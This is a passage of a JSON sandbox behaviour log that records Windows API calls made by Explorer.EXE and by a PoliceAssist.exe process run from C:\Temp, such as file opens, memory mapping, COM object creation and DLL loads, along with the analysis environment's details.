                "name": "BaseAddress",
                "value": "0x10dc0000"
              },
              {
                "name": "RegionSize",
                "value": "0x0013a000"
              }
            ],
            "repeated": 0,
            "id": 69
          },
          {
            "timestamp": "2025-11-20 10:58:35,728",
            "thread_id": "4032",
            "caller": "0x7ff736020b6a",
            "parentcaller": "0x7ff736020a51",
            "category": "filesystem",
            "api": "NtCreateFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00001ca4"
              },
              {
                "name": "DesiredAccess",
                "value": "0x80100080",
                "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\Temp\\policeassist.exe"
              },
              {
                "name": "CreateDisposition",
                "value": "1",
                "pretty_value": "FILE_OPEN"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              },
              {
                "name": "FileAttributes",
                "value": "0x00000000"
              },
              {
                "name": "ExistedBefore",
                "value": "yes"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 70
          },
          {
            "timestamp": "2025-11-20 10:58:35,728",
            "thread_id": "4032",
            "caller": "0x7ff736020b6a",
            "parentcaller": "0x7ff736020a51",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x40000003",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x00001cb0"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x10dc0000"
              },
              {
                "name": "SectionOffset",
                "value": "0x00000000"
              },
              {
                "name": "ViewSize",
                "value": "0x0013a000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 71
          },
          {
            "timestamp": "2025-11-20 10:58:35,728",
            "thread_id": "4032",
            "caller": "0x7ff736020b6a",
            "parentcaller": "0x7ff736020a51",
            "category": "filesystem",
            "api": "NtOpenFile",
            "status": false,
            "return": "0xffffffffc000003a",
            "pretty_return": "OBJECT_PATH_NOT_FOUND",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000000"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100001",
                "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\SystemResources\\policeassist.exe.mun"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              }
            ],
            "repeated": 0,
            "id": 72
          },
          {
            "timestamp": "2025-11-20 10:58:35,728",
            "thread_id": "4032",
            "caller": "0x7ff736020b6a",
            "parentcaller": "0x7ff736020a51",
            "category": "process",
            "api": "NtUnmapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x10dc0000"
              },
              {
                "name": "RegionSize",
                "value": "0x0013a000"
              }
            ],
            "repeated": 0,
            "id": 73
          },
          {
            "timestamp": "2025-11-20 10:58:35,728",
            "thread_id": "4032",
            "caller": "0x7ff736020b6a",
            "parentcaller": "0x7ff736020a51",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x095b0000"
              },
              {
                "name": "RegionSize",
                "value": "0x0001a000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 74
          },
          {
            "timestamp": "2025-11-20 10:58:35,744",
            "thread_id": "4032",
            "caller": "0x7ff736020b6a",
            "parentcaller": "0x7ff736020a51",
            "category": "filesystem",
            "api": "NtOpenFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00001cb0"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100000",
                "pretty_value": "SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\Windows\\Explorer"
              },
              {
                "name": "ShareAccess",
                "value": "0"
              }
            ],
            "repeated": 0,
            "id": 75
          },
          {
            "timestamp": "2025-11-20 10:58:35,744",
            "thread_id": "4032",
            "caller": "0x7ff736020b6a",
            "parentcaller": "0x7ff736020a51",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "317D06E8-5F24-433D-BDF7-79CE68D8ABC2"
              },
              {
                "name": "ClsContext",
                "value": "0x00000001",
                "pretty_value": "CLSCTX_INPROC_SERVER"
              },
              {
                "name": "riid",
                "value": "EC5EC8A9-C395-4314-9C77-54D7A935FF70"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 76
          },
          {
            "timestamp": "2025-11-20 10:58:35,744",
            "thread_id": "2768",
            "caller": "0x7ff73605a06e",
            "parentcaller": "0x7ff736046f8c",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "660B90C8-73A9-4B58-8CAE-355B7F55341B"
              },
              {
                "name": "ClsContext",
                "value": "0x00000003",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER"
              },
              {
                "name": "riid",
                "value": "DE25675A-72DE-44B4-9373-05170450C140"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 77
          },
          {
            "timestamp": "2025-11-20 10:58:35,744",
            "thread_id": "2768",
            "caller": "0x7ff73605a0c1",
            "parentcaller": "0x7ff736046f8c",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "shell32.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee2330000"
              }
            ],
            "repeated": 0,
            "id": 78
          },
          {
            "timestamp": "2025-11-20 10:58:35,744",
            "thread_id": "2768",
            "caller": "0x7ff73605a06e",
            "parentcaller": "0x7ff736046f8c",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "660B90C8-73A9-4B58-8CAE-355B7F55341B"
              },
              {
                "name": "ClsContext",
                "value": "0x00000003",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER"
              },
              {
                "name": "riid",
                "value": "DE25675A-72DE-44B4-9373-05170450C140"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 79
          },
          {
            "timestamp": "2025-11-20 10:58:35,744",
            "thread_id": "2768",
            "caller": "0x7ff73605a0c1",
            "parentcaller": "0x7ff736046f8c",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "shell32.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee2330000"
              }
            ],
            "repeated": 0,
            "id": 80
          },
          {
            "timestamp": "2025-11-20 10:58:35,760",
            "thread_id": "2768",
            "caller": "0x7ff73605a06e",
            "parentcaller": "0x7ff736046f8c",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "660B90C8-73A9-4B58-8CAE-355B7F55341B"
              },
              {
                "name": "ClsContext",
                "value": "0x00000003",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER"
              },
              {
                "name": "riid",
                "value": "DE25675A-72DE-44B4-9373-05170450C140"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 81
          },
          {
            "timestamp": "2025-11-20 10:58:35,760",
            "thread_id": "2768",
            "caller": "0x7ff73605a0c1",
            "parentcaller": "0x7ff736046f8c",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "shell32.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee2330000"
              }
            ],
            "repeated": 0,
            "id": 82
          },
          {
            "timestamp": "2025-11-20 10:58:35,775",
            "thread_id": "2768",
            "caller": "0x7ff73605a06e",
            "parentcaller": "0x7ff736046f8c",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "660B90C8-73A9-4B58-8CAE-355B7F55341B"
              },
              {
                "name": "ClsContext",
                "value": "0x00000003",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER"
              },
              {
                "name": "riid",
                "value": "DE25675A-72DE-44B4-9373-05170450C140"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 83
          },
          {
            "timestamp": "2025-11-20 10:58:35,775",
            "thread_id": "2768",
            "caller": "0x7ff73605a0c1",
            "parentcaller": "0x7ff736046f8c",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "shell32.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee2330000"
              }
            ],
            "repeated": 0,
            "id": 84
          },
          {
            "timestamp": "2025-11-20 10:58:35,791",
            "thread_id": "2768",
            "caller": "0x7ff73605a06e",
            "parentcaller": "0x7ff736046f8c",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "660B90C8-73A9-4B58-8CAE-355B7F55341B"
              },
              {
                "name": "ClsContext",
                "value": "0x00000003",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER"
              },
              {
                "name": "riid",
                "value": "DE25675A-72DE-44B4-9373-05170450C140"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 85
          },
          {
            "timestamp": "2025-11-20 10:58:35,791",
            "thread_id": "2768",
            "caller": "0x7ff73605a0c1",
            "parentcaller": "0x7ff736046f8c",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "shell32.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee2330000"
              }
            ],
            "repeated": 0,
            "id": 86
          },
          {
            "timestamp": "2025-11-20 10:58:35,806",
            "thread_id": "2768",
            "caller": "0x7ff73605a06e",
            "parentcaller": "0x7ff736046f8c",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "660B90C8-73A9-4B58-8CAE-355B7F55341B"
              },
              {
                "name": "ClsContext",
                "value": "0x00000003",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER"
              },
              {
                "name": "riid",
                "value": "DE25675A-72DE-44B4-9373-05170450C140"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 87
          },
          {
            "timestamp": "2025-11-20 10:58:35,806",
            "thread_id": "2768",
            "caller": "0x7ff73605a0c1",
            "parentcaller": "0x7ff736046f8c",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "shell32.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee2330000"
              }
            ],
            "repeated": 0,
            "id": 88
          },
          {
            "timestamp": "2025-11-20 10:58:35,822",
            "thread_id": "2768",
            "caller": "0x7ff73605a06e",
            "parentcaller": "0x7ff736046f8c",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "660B90C8-73A9-4B58-8CAE-355B7F55341B"
              },
              {
                "name": "ClsContext",
                "value": "0x00000003",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER"
              },
              {
                "name": "riid",
                "value": "DE25675A-72DE-44B4-9373-05170450C140"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 89
          },
          {
            "timestamp": "2025-11-20 10:58:35,822",
            "thread_id": "2768",
            "caller": "0x7ff73605a0c1",
            "parentcaller": "0x7ff736046f8c",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "shell32.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee2330000"
              }
            ],
            "repeated": 0,
            "id": 90
          },
          {
            "timestamp": "2025-11-20 10:58:35,838",
            "thread_id": "2768",
            "caller": "0x7ff73605a06e",
            "parentcaller": "0x7ff736046f8c",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "660B90C8-73A9-4B58-8CAE-355B7F55341B"
              },
              {
                "name": "ClsContext",
                "value": "0x00000003",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER"
              },
              {
                "name": "riid",
                "value": "DE25675A-72DE-44B4-9373-05170450C140"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 91
          },
          {
            "timestamp": "2025-11-20 10:58:35,838",
            "thread_id": "2768",
            "caller": "0x7ff73605a0c1",
            "parentcaller": "0x7ff736046f8c",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "shell32.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee2330000"
              }
            ],
            "repeated": 0,
            "id": 92
          },
          {
            "timestamp": "2025-11-20 10:58:35,853",
            "thread_id": "2768",
            "caller": "0x7ff73605a06e",
            "parentcaller": "0x7ff736046f8c",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "660B90C8-73A9-4B58-8CAE-355B7F55341B"
              },
              {
                "name": "ClsContext",
                "value": "0x00000003",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER"
              },
              {
                "name": "riid",
                "value": "DE25675A-72DE-44B4-9373-05170450C140"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 93
          },
          {
            "timestamp": "2025-11-20 10:58:35,853",
            "thread_id": "2768",
            "caller": "0x7ff73605a0c1",
            "parentcaller": "0x7ff736046f8c",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "shell32.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee2330000"
              }
            ],
            "repeated": 0,
            "id": 94
          },
          {
            "timestamp": "2025-11-20 10:58:35,869",
            "thread_id": "2768",
            "caller": "0x7ff73605a06e",
            "parentcaller": "0x7ff736046f8c",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "660B90C8-73A9-4B58-8CAE-355B7F55341B"
              },
              {
                "name": "ClsContext",
                "value": "0x00000003",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER"
              },
              {
                "name": "riid",
                "value": "DE25675A-72DE-44B4-9373-05170450C140"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 95
          },
          {
            "timestamp": "2025-11-20 10:58:35,869",
            "thread_id": "2768",
            "caller": "0x7ff73605a0c1",
            "parentcaller": "0x7ff736046f8c",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "shell32.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee2330000"
              }
            ],
            "repeated": 0,
            "id": 96
          },
          {
            "timestamp": "2025-11-20 10:58:35,885",
            "thread_id": "2768",
            "caller": "0x7ff73605a06e",
            "parentcaller": "0x7ff736046f8c",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "660B90C8-73A9-4B58-8CAE-355B7F55341B"
              },
              {
                "name": "ClsContext",
                "value": "0x00000003",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER"
              },
              {
                "name": "riid",
                "value": "DE25675A-72DE-44B4-9373-05170450C140"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 97
          },
          {
            "timestamp": "2025-11-20 10:58:35,885",
            "thread_id": "2768",
            "caller": "0x7ff73605a0c1",
            "parentcaller": "0x7ff736046f8c",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "shell32.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee2330000"
              }
            ],
            "repeated": 0,
            "id": 98
          },
          {
            "timestamp": "2025-11-20 10:58:35,900",
            "thread_id": "2768",
            "caller": "0x7ff73605a06e",
            "parentcaller": "0x7ff736046f8c",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "660B90C8-73A9-4B58-8CAE-355B7F55341B"
              },
              {
                "name": "ClsContext",
                "value": "0x00000003",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER"
              },
              {
                "name": "riid",
                "value": "DE25675A-72DE-44B4-9373-05170450C140"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 99
          },
          {
            "timestamp": "2025-11-20 10:58:35,900",
            "thread_id": "2768",
            "caller": "0x7ff73605a0c1",
            "parentcaller": "0x7ff736046f8c",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "shell32.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee2330000"
              }
            ],
            "repeated": 0,
            "id": 100
          },
          {
            "timestamp": "2025-11-20 10:58:36,056",
            "thread_id": "3360",
            "caller": "0x7ffee347ed8a",
            "parentcaller": "0x7ffee349db07",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x0b361000"
              },
              {
                "name": "RegionSize",
                "value": "0x00066000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 101
          },
          {
            "timestamp": "2025-11-20 10:58:36,056",
            "thread_id": "3360",
            "caller": "0x7ffee10bacfe",
            "parentcaller": "0x7ffee2f93b78",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "unload"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\system32\\WindowsInternal.ComposableShell.DesktopHosting"
              },
              {
                "name": "DllBase",
                "value": "0x7ffed4520000"
              }
            ],
            "repeated": 0,
            "id": 102
          },
          {
            "timestamp": "2025-11-20 10:58:36,056",
            "thread_id": "3360",
            "caller": "0x7ffee34e0db0",
            "parentcaller": "0x7ffee34a0391",
            "category": "process",
            "api": "NtUnmapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffed4520000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              }
            ],
            "repeated": 0,
            "id": 103
          },
          {
            "timestamp": "2025-11-20 10:58:36,056",
            "thread_id": "3360",
            "caller": "0x7ffee10bacfe",
            "parentcaller": "0x7ffee2f93b78",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "unload"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\System32\\Windows.CloudStore.Schema.Shell"
              },
              {
                "name": "DllBase",
                "value": "0x7ffece180000"
              }
            ],
            "repeated": 0,
            "id": 104
          },
          {
            "timestamp": "2025-11-20 10:58:36,056",
            "thread_id": "3360",
            "caller": "0x7ffee34e0db0",
            "parentcaller": "0x7ffee34a0391",
            "category": "process",
            "api": "NtUnmapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffece180000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              }
            ],
            "repeated": 0,
            "id": 105
          },
          {
            "timestamp": "2025-11-20 10:58:36,322",
            "thread_id": "2768",
            "caller": "0x7ff73605a06e",
            "parentcaller": "0x7ff736058f2b",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "660B90C8-73A9-4B58-8CAE-355B7F55341B"
              },
              {
                "name": "ClsContext",
                "value": "0x00000003",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER"
              },
              {
                "name": "riid",
                "value": "DE25675A-72DE-44B4-9373-05170450C140"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 106
          },
          {
            "timestamp": "2025-11-20 10:58:36,322",
            "thread_id": "2768",
            "caller": "0x7ff73605a0c1",
            "parentcaller": "0x7ff736058f2b",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "shell32.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee2330000"
              }
            ],
            "repeated": 0,
            "id": 107
          },
          {
            "timestamp": "2025-11-20 10:58:36,322",
            "thread_id": "2768",
            "caller": "0x7ff73605a06e",
            "parentcaller": "0x7ff736046f8c",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "660B90C8-73A9-4B58-8CAE-355B7F55341B"
              },
              {
                "name": "ClsContext",
                "value": "0x00000003",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER"
              },
              {
                "name": "riid",
                "value": "DE25675A-72DE-44B4-9373-05170450C140"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 108
          },
          {
            "timestamp": "2025-11-20 10:58:36,322",
            "thread_id": "2768",
            "caller": "0x7ff73605a0c1",
            "parentcaller": "0x7ff736046f8c",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "shell32.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee2330000"
              }
            ],
            "repeated": 0,
            "id": 109
          },
          {
            "timestamp": "2025-11-20 10:58:36,322",
            "thread_id": "2768",
            "caller": "0x7ff73605a06e",
            "parentcaller": "0x7ff736046f8c",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "660B90C8-73A9-4B58-8CAE-355B7F55341B"
              },
              {
                "name": "ClsContext",
                "value": "0x00000003",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER"
              },
              {
                "name": "riid",
                "value": "DE25675A-72DE-44B4-9373-05170450C140"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 110
          },
          {
            "timestamp": "2025-11-20 10:58:36,322",
            "thread_id": "2768",
            "caller": "0x7ff73605a0c1",
            "parentcaller": "0x7ff736046f8c",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "shell32.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee2330000"
              }
            ],
            "repeated": 0,
            "id": 111
          },
          {
            "timestamp": "2025-11-20 10:58:37,791",
            "thread_id": "2996",
            "caller": "0x7ffee10c56b2",
            "parentcaller": "0x7ffee2f96b6d",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\System32\\Windows.CloudStore.Schema.Shell"
              },
              {
                "name": "DllBase",
                "value": "0x7ffece180000"
              }
            ],
            "repeated": 0,
            "id": 112
          }
        ],
        "threads": [
          "3400",
          "2800",
          "2996",
          "2768",
          "3512",
          "2840",
          "4072",
          "4068",
          "4032",
          "3360"
        ],
        "environ": {
          "UserName": "Admin",
          "ComputerName": "HOME-PC",
          "WindowsPath": "C:\\Windows",
          "TempPath": "C:\\Temp\\",
          "CommandLine": "C:\\Windows\\Explorer.EXE",
          "RegisteredOwner": "",
          "RegisteredOrganization": "",
          "ProductName": "",
          "SystemVolumeSerialNumber": "a0c0-2cc3",
          "SystemVolumeGUID": "2d3f192c-0000-0000-0000-300300000000",
          "MachineGUID": "",
          "MainExeBase": "0x7ff735ff0000",
          "MainExeSize": "0x00546000",
          "Bitness": "64-bit"
        },
        "file_activities": {
          "read_files": [],
          "write_files": [],
          "delete_files": []
        }
      },
      {
        "process_id": 3308,
        "process_name": "PoliceAssist.exe",
        "parent_id": 2736,
        "module_path": "C:\\Temp\\PoliceAssist.exe",
        "first_seen": "2025-11-20 10:58:25,812",
        "calls": [
          {
            "timestamp": "2025-11-20 10:58:26,000",
            "thread_id": "2188",
            "caller": "0x7ffee34dc2c7",
            "parentcaller": "0x7ffee34dc05a",
            "category": "system",
            "api": "LdrpCallInitRoutine",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "MappedPath",
                "value": "\\Device\\HarddiskVolume2\\Windows\\System32\\wsock32"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffedc870000"
              },
              {
                "name": "InitRoutine",
                "value": "0x7ffedc871310"
              },
              {
                "name": "Reason",
                "value": "1"
              }
            ],
            "repeated": 0,
            "id": 0
          },
          {
            "timestamp": "2025-11-20 10:58:26,016",
            "thread_id": "2188",
            "caller": "0x7ffee16742c4",
            "parentcaller": "0x7ffee1673b55",
            "category": "filesystem",
            "api": "NtOpenFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x0000021c"
              },
              {
                "name": "DesiredAccess",
                "value": "0x001200a9",
                "pretty_value": "FILE_GENERIC_READ|FILE_GENERIC_EXECUTE"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\WindowsShell.Manifest"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              }
            ],
            "repeated": 0,
            "id": 1
          },
          {
            "timestamp": "2025-11-20 10:58:26,016",
            "thread_id": "2188",
            "caller": "0x7ffee1674459",
            "parentcaller": "0x7ffee1673b55",
            "category": "process",
            "api": "NtCreateSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x00000220"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000004",
                "pretty_value": "SECTION_MAP_READ"
              },
              {
                "name": "ObjectAttributes",
                "value": ""
              },
              {
                "name": "FileHandle",
                "value": "0x0000021c"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\WindowsShell.Manifest"
              }
            ],
            "repeated": 0,
            "id": 2
          },
          {
            "timestamp": "2025-11-20 10:58:26,016",
            "thread_id": "2188",
            "caller": "0x7ffee16744a6",
            "parentcaller": "0x7ffee1673b55",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x00000220"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x00800000"
              },
              {
                "name": "SectionOffset",
                "value": "0x00000000"
              },
              {
                "name": "ViewSize",
                "value": "0x00001000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 3
          },
          {
